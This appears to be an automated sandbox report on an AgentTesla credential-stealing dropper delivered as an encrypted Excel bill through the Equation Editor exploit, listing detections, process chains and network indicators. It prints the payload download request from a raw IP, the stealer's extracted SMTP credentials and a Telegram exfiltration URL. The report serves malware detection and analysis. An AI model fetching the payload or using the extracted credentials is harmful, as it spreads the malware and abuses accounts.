Analysis Report Bill # 2.xlsx

Overview

General Information

Sample Name: Bill # 2.xlsx
Analysis ID: 321163
MD5: 483b35b49726fc59ba720ca3106a69f6
SHA1: 58b66c28ec98e732920179eb4e270e7b00517f08
SHA256: 982e68644911b369c8d440f2ca7e0380b5bb7b3400fe2f53d13f34f2fce5505b
Tags: xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May check the online IP address of the machine
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2708 cmdline: 'C:\Users\Public\vbc.exe' MD5: C11D6124EE0522C7AB71D20CF3474DC0)
      • RegAsm.exe (PID: 2452 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2364 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.RegAsm.exe.400000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.vbc.exe.460000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                Sigma Overview

                System Summary:

                Sigma detected: Droppers Exploiting CVE-2017-11882
                Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.212.152, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                Sigma detected: Executables Started in Suspicious Folder
                Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Execution in Non-Executable Folder
                Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Suspicious Program Location Process Starts
                Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708

                Signature Overview

                AV Detection:

                Antivirus detection for URL or domain
                Source: http://198.23.212.152/doc/tochi.exe; Avira URL Cloud: Label: malware
                Found malware configuration
                Source: RegAsm.exe.2364.7.memstr; Malware Configuration Extractor: Agenttesla {"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}
                Multi AV Scanner detection for submitted file
                Source: Bill # 2.xlsx; Virustotal: Detection: 31%
                Machine Learning detection for dropped file
                Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe; Joe Sandbox ML: detected

                Exploits:

                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
                Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: global traffic; DNS query: name: api.ipify.org
                Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 23.21.42.25:443
                Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.212.152:80

                Networking:

                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                Source: Traffic; Snort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49167 -> 198.23.212.152:80
                Source: Traffic; Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 198.23.212.152:80
                Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
                May check the online IP address of the machine
                Source: unknown; DNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 12:47:40 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Fri, 20 Nov 2020 07:43:07 GMTETag: "97200-5b484fece2d5f"Accept-Ranges: bytesContent-Length: 619008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                Source: Joe Sandbox View; IP Address: 23.21.42.25
                Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
                Source: Joe Sandbox View; JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /doc/tochi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.152Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6B13A00.emf
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://VaMNef.com
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: RegAsm.exe, 00000007.00000002.2359903836.000000000091C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exe, 00000007.00000002.2362318559.00000000057B0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
                Source: vbc.exe, 00000004.00000003.2167387608.0000000004C74000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000007.00000002.2362741103.00000000067C0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: RegAsm.exe, 00000007.00000002.2360976971.0000000002A96000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmpString found in binary or memory: https://AkXBTiOq5oAkuzK9T5L.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: RegAsm.exe, 00000007.00000002.2360835164.00000000029D8000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgP
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

                System Summary:

                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Screenshot number: 4; Screenshot OCR: Enable Editing" from protected documents the yellow bar above
                Source: Screenshot number: 4; Screenshot OCR: protected documents the yellow bar above
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exe; Code function: 4_2_003F00AD NtOpenSection,NtMapViewOfSection
                Source: C:\Users\Public\vbc.exe; Code function: 4_2_003F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread
                Source: Bill # 2.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: tochi[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@3/2
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Bill # 2.xlsx
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE83C.tmp
                Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: Bill # 2.xlsx Virustotal: Detection: 31%
                Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Bill # 2.xlsx Initial sample: OLE indicators vbamacros = False
                Source: Bill # 2.xlsx Initial sample: OLE indicators encrypted = True
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00233860 pushfd ; iretd 7_2_00233865
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00231332 pushfd ; iretd 7_2_002313D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00231390 pushfd ; iretd 7_2_002313D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00520C40 push eax; ret 7_2_00520C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00521FF2 push eax; retf 7_2_00521FF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00521BF0 push eax; retf 0022h 7_2_00521BF1
                Source: initial sample Static PE information: section name: .text entropy: 7.8672821185
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe

                Boot Survival:

                Drops PE files to the user root directory
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                Source: Bill # 2.xlsx Stream path 'EncryptedPackage' entropy: 7.99819553665 (max. 8.0)

                Malware Analysis System Evasion:

                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 597
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592 Thread sleep time: -480000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592 Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2752 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2860 Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3000 Thread sleep count: 597 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -58908s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -56506s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -43402s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -39408s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -38316s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -34416s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -32700s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -30298s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -59594s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -58690s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -56100s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -55694s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -55008s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968 Thread sleep time: -54102s >= -30000s
